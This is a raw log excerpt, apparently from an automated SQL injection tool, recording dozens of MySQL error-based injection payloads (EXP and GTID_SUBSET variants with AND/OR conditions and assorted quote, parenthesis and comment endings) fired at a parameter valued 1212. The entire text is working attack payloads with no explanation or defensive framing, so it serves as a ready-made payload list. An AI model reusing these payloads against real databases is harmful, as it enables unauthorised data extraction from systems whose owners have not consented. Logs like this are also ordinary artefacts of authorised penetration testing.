[10:59:25] [PAYLOAD] 1212") AS bEhQ WHERE 8480=8480 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- Cxuw
[10:59:25] [PAYLOAD] 1212) AS RbtX WHERE 2758=2758 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- bWAt
[10:59:25] [PAYLOAD] 1212` WHERE 3584=3584 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- nSJB
[10:59:25] [PAYLOAD] 1212`) WHERE 9010=9010 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- uYnz
[10:59:25] [PAYLOAD] 1212`=`1212` AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND `1212`=`1212
[10:59:25] [PAYLOAD] 1212"="1212" AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND "1212"="1212
[10:59:25] [PAYLOAD] 1212]-(SELECT 0 WHERE 9392=9392 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)))|[1212
[10:59:25] [PAYLOAD] 1212' IN BOOLEAN MODE) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))#
[10:59:25] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[10:59:25] [PAYLOAD] 1212) OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- qPqi
[10:59:25] [PAYLOAD] 1212') OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- iKpD
[10:59:25] [PAYLOAD] 1212' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- XdBc
[10:59:25] [PAYLOAD] 1212" OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- aiNL
[10:59:25] [PAYLOAD] 1212) OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND (8945=8945
[10:59:25] [PAYLOAD] 1212)) OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND ((9736=9736
[10:59:25] [PAYLOAD] 1212))) OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND (((6647=6647
[10:59:25] [PAYLOAD] 1212 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))
[10:59:25] [PAYLOAD] 1212') OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND ('UzOm'='UzOm
[10:59:25] [PAYLOAD] 1212')) OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND (('JNoG'='JNoG
[10:59:25] [PAYLOAD] 1212'))) OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND ((('lvRU'='lvRU
[10:59:25] [PAYLOAD] 1212' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND 'MirD'='MirD
[10:59:25] [PAYLOAD] 1212') OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND ('whuz' LIKE 'whuz
[10:59:25] [PAYLOAD] 1212')) OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND (('HaZN' LIKE 'HaZN
[10:59:25] [PAYLOAD] 1212'))) OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND ((('BCem' LIKE 'BCem
[10:59:25] [PAYLOAD] 1212%' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND 'PMiK%'='PMiK
[10:59:25] [PAYLOAD] 1212' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND 'qWQF' LIKE 'qWQF
[10:59:26] [PAYLOAD] 1212") OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND ("IxnD"="IxnD
[10:59:26] [PAYLOAD] 1212")) OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND (("MTyq"="MTyq
[10:59:26] [PAYLOAD] 1212"))) OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND ((("LcxR"="LcxR
[10:59:26] [PAYLOAD] 1212" OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND "RDxe"="RDxe
[10:59:26] [PAYLOAD] 1212") OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND ("jmWk" LIKE "jmWk
[10:59:26] [PAYLOAD] 1212")) OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND (("qeqM" LIKE "qeqM
[10:59:26] [PAYLOAD] 1212"))) OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND ((("MhlJ" LIKE "MhlJ
[10:59:26] [PAYLOAD] 1212" OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND "VUaA" LIKE "VUaA
[10:59:26] [PAYLOAD] 1212 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- mXHu
[10:59:26] [PAYLOAD] 1212 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))# KgCD
[10:59:26] [PAYLOAD] 1212' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) OR 'nbWi'='qLJL
[10:59:26] [PAYLOAD] 1212') WHERE 2783=2783 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- NYSz
[10:59:26] [PAYLOAD] 1212") WHERE 4733=4733 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- IBzT
[10:59:26] [PAYLOAD] 1212) WHERE 4304=4304 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- HkOy
[10:59:26] [PAYLOAD] 1212' WHERE 5398=5398 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- wAau
[10:59:26] [PAYLOAD] 1212" WHERE 8403=8403 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- JGSC
[10:59:26] [PAYLOAD] 1212 WHERE 5286=5286 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- RJyd
[10:59:26] [PAYLOAD] 1212'||(SELECT 0x596f494d WHERE 7161=7161 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)))||'
[10:59:26] [PAYLOAD] 1212'||(SELECT 0x62696569 FROM DUAL WHERE 5218=5218 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)))||'
[10:59:26] [PAYLOAD] 1212'+(SELECT 0x67615368 WHERE 9561=9561 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)))+'
[10:59:26] [PAYLOAD] 1212||(SELECT 0x4a624162 FROM DUAL WHERE 4597=4597 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)))||
[10:59:26] [PAYLOAD] 1212||(SELECT 0x4e676879 WHERE 9786=9786 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)))||
[10:59:26] [PAYLOAD] 1212+(SELECT qelJ WHERE 8471=8471 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)))+
[10:59:26] [PAYLOAD] 1212+(SELECT 0x79764977 WHERE 9830=9830 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)))+
[10:59:26] [PAYLOAD] 1212')) AS Qrhp WHERE 2148=2148 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- pEaV
[10:59:26] [PAYLOAD] 1212")) AS fkzc WHERE 1800=1800 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- yPpo
[10:59:26] [PAYLOAD] 1212)) AS SQRn WHERE 1096=1096 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- DIOP
[10:59:26] [PAYLOAD] 1212') AS WwsB WHERE 7253=7253 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- VryT
[10:59:26] [PAYLOAD] 1212") AS Ruhp WHERE 7886=7886 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- gEWR
[10:59:26] [PAYLOAD] 1212) AS PypN WHERE 7102=7102 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- AzVU
[10:59:26] [PAYLOAD] 1212` WHERE 7722=7722 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- IeVN
[10:59:26] [PAYLOAD] 1212`) WHERE 4578=4578 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))-- OGoR
[10:59:26] [PAYLOAD] 1212`=`1212` OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND `1212`=`1212
[10:59:26] [PAYLOAD] 1212"="1212" OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)) AND "1212"="1212
[10:59:26] [PAYLOAD] 1212]-(SELECT 0 WHERE 9115=9115 OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x)))|[1212
[10:59:26] [PAYLOAD] 1212' IN BOOLEAN MODE) OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(6697=6697,1))),0x7176627071,0x78))x))#
[10:59:26] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[10:59:26] [PAYLOAD] 1212) AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- yhnW
[10:59:26] [PAYLOAD] 1212') AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- wjjk
[10:59:26] [PAYLOAD] 1212' AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- ljDy
[10:59:26] [PAYLOAD] 1212" AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- eJxu
[10:59:26] [PAYLOAD] 1212) AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND (7945=7945
[10:59:26] [PAYLOAD] 1212)) AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND ((2994=2994
[10:59:26] [PAYLOAD] 1212))) AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND (((1250=1250
[10:59:26] [PAYLOAD] 1212 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)
[10:59:26] [PAYLOAD] 1212') AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND ('JNhh'='JNhh
[10:59:26] [PAYLOAD] 1212')) AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND (('CojR'='CojR
[10:59:26] [PAYLOAD] 1212'))) AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND ((('Gwwr'='Gwwr
[10:59:26] [PAYLOAD] 1212' AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND 'PeWY'='PeWY
[10:59:26] [PAYLOAD] 1212') AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND ('fnWr' LIKE 'fnWr
[10:59:26] [PAYLOAD] 1212')) AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND (('wNuP' LIKE 'wNuP
[10:59:26] [PAYLOAD] 1212'))) AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND ((('UXPm' LIKE 'UXPm
[10:59:26] [PAYLOAD] 1212%' AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND 'LHTE%'='LHTE
[10:59:26] [PAYLOAD] 1212' AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND 'nEgJ' LIKE 'nEgJ
[10:59:26] [PAYLOAD] 1212") AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND ("LTKB"="LTKB
[10:59:26] [PAYLOAD] 1212")) AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND (("biqr"="biqr
[10:59:26] [PAYLOAD] 1212"))) AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND ((("Susy"="Susy
[10:59:26] [PAYLOAD] 1212" AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND "JXwQ"="JXwQ
[10:59:26] [PAYLOAD] 1212") AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND ("uScs" LIKE "uScs
[10:59:26] [PAYLOAD] 1212")) AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND (("SShP" LIKE "SShP
[10:59:26] [PAYLOAD] 1212"))) AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND ((("REIE" LIKE "REIE
[10:59:26] [PAYLOAD] 1212" AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND "WBiA" LIKE "WBiA
[10:59:26] [PAYLOAD] 1212 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- VKUg
[10:59:26] [PAYLOAD] 1212 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)# CfDf
[10:59:26] [PAYLOAD] 1212' AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) OR 'XhvQ'='MRhV
[10:59:26] [PAYLOAD] 1212') WHERE 7448=7448 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- Pefo
[10:59:26] [PAYLOAD] 1212") WHERE 2704=2704 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- Gwgs
[10:59:26] [PAYLOAD] 1212) WHERE 2372=2372 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- VkFk
[10:59:27] [PAYLOAD] 1212' WHERE 4193=4193 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- GZLk
[10:59:27] [PAYLOAD] 1212" WHERE 4580=4580 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- PhwN
[10:59:27] [PAYLOAD] 1212 WHERE 7789=7789 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- gRUA
[10:59:27] [PAYLOAD] 1212'||(SELECT 0x6a425a6f WHERE 8451=8451 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199))||'
[10:59:27] [PAYLOAD] 1212'||(SELECT 0x464f4a42 FROM DUAL WHERE 1226=1226 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199))||'
[10:59:27] [PAYLOAD] 1212'+(SELECT 0x47486f6e WHERE 3320=3320 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199))+'
[10:59:27] [PAYLOAD] 1212||(SELECT 0x6d787559 FROM DUAL WHERE 5069=5069 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199))||
[10:59:27] [PAYLOAD] 1212||(SELECT 0x76716269 WHERE 6447=6447 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199))||
[10:59:27] [PAYLOAD] 1212+(SELECT gUSh WHERE 7979=7979 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199))+
[10:59:27] [PAYLOAD] 1212+(SELECT 0x4c6c504f WHERE 7995=7995 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199))+
[10:59:27] [PAYLOAD] 1212')) AS rYaW WHERE 4588=4588 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- WXYb
[10:59:27] [PAYLOAD] 1212")) AS dNTr WHERE 5425=5425 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- BOPV
[10:59:27] [PAYLOAD] 1212)) AS FcxE WHERE 2926=2926 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- rkcg
[10:59:27] [PAYLOAD] 1212') AS xuHV WHERE 6950=6950 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- zDpp
[10:59:27] [PAYLOAD] 1212") AS HEXl WHERE 4354=4354 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- NJdC
[10:59:27] [PAYLOAD] 1212) AS jfPd WHERE 7124=7124 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- vzuC
[10:59:27] [PAYLOAD] 1212` WHERE 4583=4583 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- Nnud
[10:59:27] [PAYLOAD] 1212`) WHERE 8678=8678 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)-- mMDF
[10:59:27] [PAYLOAD] 1212`=`1212` AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND `1212`=`1212
[10:59:27] [PAYLOAD] 1212"="1212" AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199) AND "1212"="1212
[10:59:27] [PAYLOAD] 1212]-(SELECT 0 WHERE 3343=3343 AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199))|[1212
[10:59:27] [PAYLOAD] 1212' IN BOOLEAN MODE) AND GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(5199=5199,1))),0x7176627071),5199)#
[10:59:27] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[10:59:27] [PAYLOAD] 1212) OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- WgYN
[10:59:27] [PAYLOAD] 1212') OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- rMhb
[10:59:27] [PAYLOAD] 1212' OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- mHOA
[10:59:27] [PAYLOAD] 1212" OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- yrfq
[10:59:27] [PAYLOAD] 1212) OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND (4689=4689
[10:59:27] [PAYLOAD] 1212)) OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND ((4733=4733
[10:59:27] [PAYLOAD] 1212))) OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND (((6341=6341
[10:59:27] [PAYLOAD] 1212 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)
[10:59:27] [PAYLOAD] 1212') OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND ('OWuA'='OWuA
[10:59:27] [PAYLOAD] 1212')) OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND (('Hbvu'='Hbvu
[10:59:27] [PAYLOAD] 1212'))) OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND ((('Mjsc'='Mjsc
[10:59:27] [PAYLOAD] 1212' OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND 'eyiP'='eyiP
[10:59:27] [PAYLOAD] 1212') OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND ('Nyme' LIKE 'Nyme
[10:59:27] [PAYLOAD] 1212')) OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND (('fuyU' LIKE 'fuyU
[10:59:27] [PAYLOAD] 1212'))) OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND ((('VIiq' LIKE 'VIiq
[10:59:27] [PAYLOAD] 1212%' OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND 'QhRq%'='QhRq
[10:59:27] [PAYLOAD] 1212' OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND 'ECOm' LIKE 'ECOm
[10:59:27] [PAYLOAD] 1212") OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND ("KmXh"="KmXh
[10:59:27] [PAYLOAD] 1212")) OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND (("RAQR"="RAQR
[10:59:27] [PAYLOAD] 1212"))) OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND ((("pXHW"="pXHW
[10:59:27] [PAYLOAD] 1212" OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND "AzaC"="AzaC
[10:59:27] [PAYLOAD] 1212") OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND ("yEFj" LIKE "yEFj
[10:59:27] [PAYLOAD] 1212")) OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND (("VdMY" LIKE "VdMY
[10:59:27] [PAYLOAD] 1212"))) OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND ((("yScL" LIKE "yScL
[10:59:27] [PAYLOAD] 1212" OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) AND "IBRt" LIKE "IBRt
[10:59:27] [PAYLOAD] 1212 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- JvOM
[10:59:27] [PAYLOAD] 1212 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)# ChAb
[10:59:27] [PAYLOAD] 1212' OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467) OR 'VLyb'='VYvA
[10:59:27] [PAYLOAD] 1212') WHERE 9922=9922 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- RIHb
[10:59:27] [PAYLOAD] 1212") WHERE 5408=5408 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- tazo
[10:59:27] [PAYLOAD] 1212) WHERE 5843=5843 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- mOcy
[10:59:27] [PAYLOAD] 1212' WHERE 3845=3845 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- wTcs
[10:59:27] [PAYLOAD] 1212" WHERE 8370=8370 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- Dwif
[10:59:27] [PAYLOAD] 1212 WHERE 8861=8861 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467)-- Iech
[10:59:27] [PAYLOAD] 1212'||(SELECT 0x51565052 WHERE 5529=5529 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467))||'
[10:59:27] [PAYLOAD] 1212'||(SELECT 0x54697957 FROM DUAL WHERE 6150=6150 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467))||'
[10:59:27] [PAYLOAD] 1212'+(SELECT 0x644f5351 WHERE 8069=8069 OR GTID_SUBSET(CONCAT(0x7162707a71,(SELECT (ELT(1467=1467,1))),0x7176627071),1467))+'
